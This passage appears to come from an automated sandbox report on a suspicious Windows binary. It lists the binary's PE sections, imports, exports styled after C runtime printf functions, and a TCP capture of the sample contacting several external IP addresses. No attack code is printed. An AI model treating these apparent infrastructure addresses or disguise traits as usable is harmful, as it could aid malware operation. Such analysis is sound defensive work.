                            int3
                            int3
                            int3
                            nop word ptr [eax+eax+00000000h]
                            dec eax
                            cmp ecx, dword ptr [000C1521h]
                            jne 00007F3650BFC6E2h
                            dec eax
                            rol ecx, 10h
                            test cx, FFFFh
                            jne 00007F3650BFC6D3h
                            ret
                            dec eax
                            ror ecx, 10h
                            jmp 00007F3650BFD2FBh
                            int3

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x13f4a00xf28.rdata
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x1403c80x3c.rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1540000x2830.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1450000xd440.pdata
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1570000xde8.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x12cde00x1c.rdata
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x12ce000x138.rdata
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0xfb0000x400.rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000xf91c00xf9200False0.4738538008028098data6.4820208618671655IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata0xfb0000x461680x46200False0.42493176247771836Applesoft BASIC program data, first line number 206.085100690960691IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data0x1420000x2c280x1000False0.194580078125data2.5788698684388627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .pdata0x1450000xd4400xd600False0.5032673773364486data6.092690574862316IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            _RDATA0x1530000xfc0x200False0.32421875data2.4523174065423476IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .rsrc0x1540000x28300x2a00False0.37611607142857145data5.275825671416588IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0x1570000xde80xe00False0.4642857142857143data5.410277041190588IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountry
                            RT_ICON0x1540f00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States
                            RT_GROUP_ICON0x1566980x14dataEnglishUnited States
                            RT_MANIFEST0x1566b00x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States

                            Imports

                            DLLImport
                            KERNEL32.dllGetCommandLineW, GetCurrentProcess, GetCurrentProcessId, GetTickCount, GetLargePageMinimum, GetModuleHandleW, GetUserDefaultLangID, GetSystemDefaultLangID, GetLastError, SetLastError, RtlCaptureContext, RtlLookupFunctionEntry, RtlRestoreContext, RtlUnwindEx, RtlVirtualUnwind, RaiseException, GetProcAddress, LoadLibraryExA, VirtualAlloc, VirtualFree, VirtualQuery, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, WaitForSingleObject, Sleep, CreateThread, FreeLibrary, GetModuleFileNameA, GetModuleHandleA, GetModuleHandleExA, FormatMessageA, VirtualProtect, WriteConsoleW, SetEndOfFile, HeapReAlloc, HeapSize, GetProcessHeap, GetStringTypeW, SetStdHandle, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, TerminateProcess, InterlockedPushEntrySList, InterlockedFlushSList, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, EncodePointer, RtlPcToFileHeader, GetCommandLineA, SetConsoleCtrlHandler, ExitProcess, GetModuleHandleExW, ReadFile, CloseHandle, DuplicateHandle, CreateProcessW, GetTempPathW, QueryPerformanceFrequency, GetStdHandle, WriteFile, GetModuleFileNameW, GetCurrentThread, HeapAlloc, HeapFree, GetDateFormatW, GetTimeFormatW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, GetConsoleMode, ReadConsoleW, FlushFileBuffers, GetConsoleOutputCP, GetFileSizeEx, SetFilePointerEx, GetExitCodeProcess, GetFileAttributesExW, CreatePipe, CreateFileW, GetTimeZoneInformation, MultiByteToWideChar, WideCharToMultiByte, DeleteFileW, MoveFileExW, OutputDebugStringW, FindClose, FindFirstFileExW, RtlUnwind
                            USER32.dllGetTopWindow, GetShellWindow, GetParent, GetDesktopWindow, GetWindowTextLengthW, GetLastActivePopup, IsZoomed, AnyPopup, IsIconic, GetDoubleClickTime, GetMessageExtraInfo, GetMessageTime, GetForegroundWindow

                            Exports

                            NameOrdinalAddress
                            __swprintf_l10x14000ec10
                            __vswprintf_l20x14000ec70
                            _fprintf_l30x14000ece0
                            _fprintf_p40x14000ed30
                            _fprintf_p_l50x14000ed80
                            _fprintf_s_l60x14000edd0
                            _fscanf_l70x14000ee20
                            _fscanf_s_l80x14000ee70
                            _fwprintf_l90x14000eec0
                            _fwprintf_p100x14000ef10
                            _fwprintf_p_l110x14000ef60
                            _fwprintf_s_l120x14000efb0
                            _fwscanf_l130x14000f000
                            _fwscanf_s_l140x14000f050
                            _printf_l150x14000f0a0
                            _printf_p160x14000f100
                            _printf_p_l170x14000f160
                            _printf_s_l180x14000f1c0
                            _scanf_l190x14000f220
                            _scanf_s_l200x14000f270
                            _scprintf210x14000f2d0
                            _scprintf_l220x14000f330
                            _scprintf_p230x14000f390
                            _scprintf_p_l240x14000f3f0
                            _scwprintf250x14000f450
                            _scwprintf_l260x14000f4b0
                            _scwprintf_p270x14000f510
                            _scwprintf_p_l280x14000f570
                            _snprintf290x14000f5d0
                            _snprintf_c300x14000f630
                            _snprintf_c_l310x14000f690
                            _snprintf_l320x14000f6f0
                            _snprintf_s330x14000f750
                            _snprintf_s_l340x14000f7c0
                            _snscanf350x14000f830
                            _snscanf_l360x14000f880
                            _snscanf_s370x14000f8d0
                            _snscanf_s_l380x14000f930
                            _snwprintf390x14000f990
                            _snwprintf_l400x14000f9f0
                            _snwprintf_s410x14000fa50
                            _snwprintf_s_l420x14000fac0
                            _snwscanf430x14000fb30
                            _snwscanf_l440x14000fb80
                            _snwscanf_s450x14000fbd0
                            _snwscanf_s_l460x14000fc30
                            _sprintf_l470x14000fc90
                            _sprintf_p480x14000fcf0
                            _sprintf_p_l490x14000fd50
                            _sprintf_s_l500x14000fdb0
                            _sscanf_l510x14000fe10
                            _sscanf_s_l520x14000fe60
                            _swprintf530x14000fec0
                            _swprintf_c540x14000ff20
                            _swprintf_c_l550x14000ff80
                            _swprintf_l560x14000ffe0
                            _swprintf_p570x140010040
                            _swprintf_p_l580x1400100a0
                            _swprintf_s_l590x140010100
                            _swscanf_l600x140010160
                            _swscanf_s_l610x1400101b0
                            _vfprintf_l620x140010210
                            _vfprintf_p630x140010260
                            _vfprintf_p_l640x1400102b0
                            _vfprintf_s_l650x140010300
                            _vfscanf_l660x140010350
                            _vfscanf_s_l670x1400103a0
                            _vfwprintf_l680x140010400
                            _vfwprintf_p690x140010450
                            _vfwprintf_p_l700x1400104a0
                            _vfwprintf_s_l710x1400104f0
                            _vfwscanf_l720x140010540
                            _vfwscanf_s_l730x140010590
                            _vprintf_l740x1400105f0
                            _vprintf_p750x140010650
                            _vprintf_p_l760x1400106a0
                            _vprintf_s_l770x140010700
                            _vscanf_l780x140010760
                            _vscanf_s_l790x1400107c0
                            _vscprintf800x140010820
                            _vscprintf_l810x140010870
                            _vscprintf_p820x1400108d0
                            _vscprintf_p_l830x140010920
                            _vscwprintf840x140010980
                            _vscwprintf_l850x1400109d0
                            _vscwprintf_p860x140010a30
                            _vscwprintf_p_l870x140010a80
                            _vsnprintf880x140010ae0
                            _vsnprintf_c890x140010b50
                            _vsnprintf_c_l900x140010bc0
                            _vsnprintf_l910x140010c30
                            _vsnprintf_s920x140010ca0
                            _vsnprintf_s_l930x140010d10
                            _vsnwprintf940x140010d80
                            _vsnwprintf_l950x140010df0
                            _vsnwprintf_s960x140010e60
                            _vsnwprintf_s_l970x140010ed0
                            _vsnwscanf_l980x140010f40
                            _vsnwscanf_s_l990x140010fa0
                            _vsprintf_l1000x140011000
                            _vsprintf_p1010x140011070
                            _vsprintf_p_l1020x1400110e0
                            _vsprintf_s_l1030x140011150
                            _vsscanf_l1040x1400111c0
                            _vsscanf_s_l1050x140011220
                            _vswprintf1060x140011280
                            _vswprintf_c1070x1400112e0
                            _vswprintf_c_l1080x140011350
                            _vswprintf_l1090x1400113c0
                            _vswprintf_p1100x140011430
                            _vswprintf_p_l1110x1400114a0
                            _vswprintf_s_l1120x140011510
                            _vswscanf_l1130x140011580
                            _vswscanf_s_l1140x1400115e0
                            _vwprintf_l1150x140011640
                            _vwprintf_p1160x1400116a0
                            _vwprintf_p_l1170x1400116f0
                            _vwprintf_s_l1180x140011750
                            _vwscanf_l1190x1400117b0
                            _vwscanf_s_l1200x140011810
                            _wprintf_l1210x140011870
                            _wprintf_p1220x1400118d0
                            _wprintf_p_l1230x140011930
                            _wprintf_s_l1240x140011990
                            _wscanf_l1250x1400119f0
                            _wscanf_s_l1260x140011a40
                            fprintf1270x140011ba0
                            fprintf_s1280x140011bf0
                            fscanf1290x140011c40
                            fscanf_s1300x140011c90
                            fwprintf1310x140011ce0
                            fwprintf_s1320x140011d30
                            fwscanf1330x140011d80
                            fwscanf_s1340x140011dd0
                            printf1350x1400125c0
                            printf_s1360x140012620
                            scanf1370x140012710
                            scanf_s1380x140012760
                            snprintf1390x140012820
                            sprintf1400x140012880
                            sprintf_s1410x1400128e0
                            sscanf1420x140012940
                            sscanf_s1430x1400129a0
                            swprintf1440x140012a00
                            swprintf_s1450x140012a60
                            swscanf1460x140012ac0
                            swscanf_s1470x140012b20
                            vfprintf1480x140012b80
                            vfprintf_s1490x140012bd0
                            vfscanf1500x140012c20
                            vfscanf_s1510x140012c70
                            vfwprintf1520x140012cc0
                            vfwprintf_s1530x140012d10
                            vfwscanf1540x140012d60
                            vfwscanf_s1550x140012db0
                            vprintf1560x140012e00
                            vprintf_s1570x140012e50
                            vscanf1580x140012ea0
                            vscanf_s1590x140012ef0
                            vsnprintf1600x140012f40
                            vsnprintf_s1610x140012fb0
                            vsprintf1620x140013020
                            vsprintf_s1630x140013080
                            vsscanf1640x1400130f0
                            vsscanf_s1650x140013140
                            vswprintf1660x1400131a0
                            vswprintf_s1670x140013210
                            vswscanf1680x140013280
                            vswscanf_s1690x1400132d0
                            vwprintf1700x140013330
                            vwprintf_s1710x140013380
                            vwscanf1720x1400133d0
                            vwscanf_s1730x140013420
                            wprintf1740x140013470
                            wprintf_s1750x1400134d0
                            wscanf1760x140013530
                            wscanf_s1770x140013580

                            Possible Origin

                            Language of compilation systemCountry where language is spokenMap
                            EnglishUnited States

                            Network Behavior

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            May 14, 2023 04:49:30.760180950 CEST4969280192.168.2.3208.95.112.1
                            May 14, 2023 04:49:30.791992903 CEST8049692208.95.112.1192.168.2.3
                            May 14, 2023 04:49:30.792133093 CEST4969280192.168.2.3208.95.112.1
                            May 14, 2023 04:49:30.792505980 CEST4969280192.168.2.3208.95.112.1
                            May 14, 2023 04:49:30.834532022 CEST8049692208.95.112.1192.168.2.3
                            May 14, 2023 04:49:30.834650993 CEST4969280192.168.2.3208.95.112.1
                            May 14, 2023 04:49:30.919837952 CEST4969380192.168.2.3185.159.130.81
                            May 14, 2023 04:49:33.927879095 CEST4969380192.168.2.3185.159.130.81
                            May 14, 2023 04:49:39.928412914 CEST4969380192.168.2.3185.159.130.81
                            May 14, 2023 04:49:51.987220049 CEST4970080192.168.2.3185.159.129.168
                            May 14, 2023 04:49:52.048655033 CEST8049700185.159.129.168192.168.2.3
                            May 14, 2023 04:49:52.048780918 CEST4970080192.168.2.3185.159.129.168
                            May 14, 2023 04:49:52.049341917 CEST4970080192.168.2.3185.159.129.168
                            May 14, 2023 04:49:52.110551119 CEST8049700185.159.129.168192.168.2.3
                            May 14, 2023 04:49:52.255124092 CEST8049700185.159.129.168192.168.2.3
                            May 14, 2023 04:49:52.255157948 CEST8049700185.159.129.168192.168.2.3
                            May 14, 2023 04:49:52.255184889 CEST8049700185.159.129.168192.168.2.3
                            May 14, 2023 04:49:52.255299091 CEST4970080192.168.2.3185.159.129.168
                            May 14, 2023 04:49:52.255361080 CEST4970080192.168.2.3185.159.129.168
                            May 14, 2023 04:49:52.656838894 CEST4970180192.168.2.3144.76.136.153
                            May 14, 2023 04:49:52.681845903 CEST8049701144.76.136.153192.168.2.3
                            May 14, 2023 04:49:52.682132006 CEST4970180192.168.2.3144.76.136.153
                            May 14, 2023 04:49:52.692018032 CEST4970180192.168.2.3144.76.136.153
                            May 14, 2023 04:49:52.716825008 CEST8049701144.76.136.153192.168.2.3
                            May 14, 2023 04:49:52.716860056 CEST8049701144.76.136.153192.168.2.3
                            May 14, 2023 04:49:52.716917038 CEST4970180192.168.2.3144.76.136.153
                            May 14, 2023 04:49:52.726227045 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:52.726290941 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:52.726382017 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:52.744548082 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:52.744596004 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:52.845347881 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:52.845551968 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:53.174319029 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:53.174366951 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:53.174990892 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:53.175081015 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:53.177578926 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:53.223422050 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:53.945267916 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:53.945324898 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:53.945350885 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:53.945404053 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:53.945451975 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:53.945470095 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:53.945488930 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:53.945571899 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:53.945607901 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:53.967178106 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:53.967233896 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:53.967330933 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:53.967358112 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:53.967379093 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:53.967406988 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:53.967945099 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:53.967983007 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:53.968044043 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:53.968055010 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:53.968066931 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:53.968094110 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:53.968133926 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:53.968147993 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:53.968174934 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:53.968194962 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:53.989280939 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:53.989358902 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:53.989475965 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:53.989536047 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:53.989545107 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:53.989573956 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:53.989605904 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:53.989645004 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:53.989835024 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:53.989870071 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:53.989908934 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:53.989923000 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:53.989943981 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:53.989964008 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:53.990159035 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:53.990190029 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:53.990246058 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:53.990255117 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:53.990312099 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:53.990441084 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:53.990472078 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:53.990535975 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:53.990545034 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:53.990576029 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:53.990602016 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:53.990722895 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:53.990756035 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:53.990801096 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:53.990813017 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:53.990854025 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:53.990876913 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.011769056 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.011831999 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.011934042 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.011993885 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.012022018 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.012051105 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.012072086 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.012125969 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.012150049 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.012829065 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.012871027 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.012948990 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.012964964 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.013017893 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.013050079 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.013111115 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.013159037 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.013202906 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.013216972 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.013262033 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.013289928 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.013389111 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.013444901 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.013484955 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.013494968 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.013540983 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.013567924 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.013636112 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.013686895 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.013730049 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.013747931 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.013787031 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.013818026 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.013822079 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.013843060 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.013895988 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.013901949 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.013952017 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.013962984 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.013988972 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.014013052 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.014266014 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.014332056 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.014358997 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.014369965 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.014434099 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.014471054 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.014518023 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.014555931 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.014571905 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.014615059 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.014646053 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.014812946 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.014848948 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.014895916 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.014904022 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.014960051 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.014964104 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.014981031 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.015019894 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.015031099 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.015078068 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.015084028 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.015110970 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.015137911 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.015279055 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.015378952 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.015387058 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.015441895 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.015491962 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.015536070 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.034065008 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.034111023 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.034246922 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.034272909 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.034300089 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.034328938 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.034338951 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.034367085 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.034378052 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.034401894 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.034437895 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.034550905 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.034607887 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.034643888 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.034657001 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.034682989 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.034714937 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.036220074 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.036256075 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.036343098 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.036355019 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.036395073 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.036415100 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.037247896 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.037280083 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.037395000 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.037415981 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.037431002 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.037458897 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.037535906 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.037566900 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.037614107 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.037625074 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.037661076 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.037687063 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.037811041 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.037841082 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.037892103 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.037902117 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.037941933 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.037964106 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.038108110 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.038139105 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.038198948 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.038208961 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.038239956 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.038263083 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.038391113 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.038420916 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.038471937 CEST49702443192.168.2.3144.76.136.153
                            May 14, 2023 04:49:54.038480043 CEST44349702144.76.136.153192.168.2.3
                            May 14, 2023 04:49:54.038511992 CEST49702443192.168.2.3144.76.136.153
